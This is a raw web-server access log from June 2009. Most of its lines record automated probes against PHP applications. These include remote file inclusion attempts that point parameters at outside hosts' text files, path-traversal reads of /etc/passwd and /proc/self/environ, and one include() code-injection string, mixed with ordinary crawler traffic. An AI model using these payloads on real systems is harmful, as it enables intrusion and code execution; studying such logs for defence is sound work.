218.232.105.116 - - [29/Jun/2009:21:18:44 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
38.103.48.109 - - [29/Jun/2009:21:18:59 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "redneckmba.com"
38.103.48.109 - - [29/Jun/2009:21:18:59 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "redneckmba.com"
38.103.48.109 - - [29/Jun/2009:21:18:59 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "redneckmba.com"
84.201.208.50 - - [29/Jun/2009:21:20:55 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
84.201.208.50 - - [29/Jun/2009:21:20:55 -0700] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
84.201.208.50 - - [29/Jun/2009:21:20:55 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
38.103.48.109 - - [29/Jun/2009:21:21:12 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.redneckmba.com"
38.103.48.109 - - [29/Jun/2009:21:21:12 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:22:51 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:22:51 -0700] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:22:51 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:22:59 -0700] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:22:59 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:22:59 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:23:40 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:23:40 -0700] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:23:41 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
38.103.48.109 - - [29/Jun/2009:21:24:18 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:24:40 -0700] "GET /logs/access_090112.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:24:40 -0700] "GET /logs/access_090112.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:25:03 -0700] "GET /logs/access_090112.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:25:49 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [29/Jun/2009:21:26:10 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:26:37 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:26:54 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
38.117.93.134 - - [29/Jun/2009:21:29:08 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.114.106 - - [29/Jun/2009:21:31:59 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
65.55.51.112 - - [29/Jun/2009:21:43:17 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
66.163.171.207 - - [29/Jun/2009:21:51:01 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
121.165.73.157 - - [29/Jun/2009:21:53:46 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ghlib.net/design01/user/user/info/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:21:53:46 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ghlib.net/design01/user/user/info/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
121.165.73.157 - - [29/Jun/2009:21:53:47 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ghlib.net/design01/user/user/info/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.17.99.13 - - [29/Jun/2009:21:54:53 -0700] "GET /logs/access.log/admin.php?_shop_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.redneckmba.com"
216.17.99.13 - - [29/Jun/2009:21:54:53 -0700] "GET /logs/admin.php?_shop_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.redneckmba.com"
216.17.99.13 - - [29/Jun/2009:21:54:53 -0700] "GET /admin.php?_shop_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.redneckmba.com"
76.13.114.106 - - [29/Jun/2009:22:06:23 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
72.14.199.8 - - [29/Jun/2009:22:08:01 -0700] "GET /blog/ HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=2093614446390835355)" "www.redneckmba.com"
60.251.217.4 - - [29/Jun/2009:22:09:58 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
60.251.217.4 - - [29/Jun/2009:22:10:28 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
60.251.217.4 - - [29/Jun/2009:22:10:28 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:13:59 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:18:58 -0700] "GET /include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:18:58 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:18:58 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.55.210.92 - - [29/Jun/2009:22:19:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
65.55.210.92 - - [29/Jun/2009:22:19:55 -0700] "GET /logs/?D=D HTTP/1.1" 200 1939 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:20:05 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:20:05 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:20:05 -0700] "GET /include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:23:54 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:23:54 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:23:54 -0700] "GET /include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:24:18 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:24:18 -0700] "GET /include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:22:24:18 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [29/Jun/2009:22:24:48 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
65.55.210.92 - - [29/Jun/2009:22:25:50 -0700] "GET /logs/access_090601.log HTTP/1.1" 200 1048576 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
217.147.29.190 - - [29/Jun/2009:22:35:28 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
217.147.29.190 - - [29/Jun/2009:22:35:29 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
217.147.29.190 - - [29/Jun/2009:22:35:29 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
216.117.172.131 - - [29/Jun/2009:22:37:39 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:22:37:40 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:22:37:42 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:22:37:42 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:22:37:43 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:22:37:43 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:22:39:26 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:22:39:26 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:22:39:26 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:22:39:33 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:22:39:33 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:22:39:33 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
217.147.29.190 - - [29/Jun/2009:22:39:55 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.107 - - [29/Jun/2009:22:42:15 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
217.147.29.190 - - [29/Jun/2009:22:45:24 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
217.147.29.190 - - [29/Jun/2009:22:45:24 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
217.147.29.190 - - [29/Jun/2009:22:45:24 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:22:47:58 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:22:48:05 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [29/Jun/2009:22:53:58 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
217.147.29.190 - - [29/Jun/2009:22:56:03 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:57:03 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:57:03 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:57:03 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:57:03 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:57:03 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:57:03 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:57:03 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "redneckmba.com"
207.210.89.18 - - [29/Jun/2009:22:57:03 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "redneckmba.com"
66.163.171.206 - - [29/Jun/2009:22:59:34 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
217.147.29.190 - - [29/Jun/2009:23:01:36 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
217.147.29.190 - - [29/Jun/2009:23:01:36 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
217.147.29.190 - - [29/Jun/2009:23:01:37 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.55.106.110 - - [29/Jun/2009:23:10:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
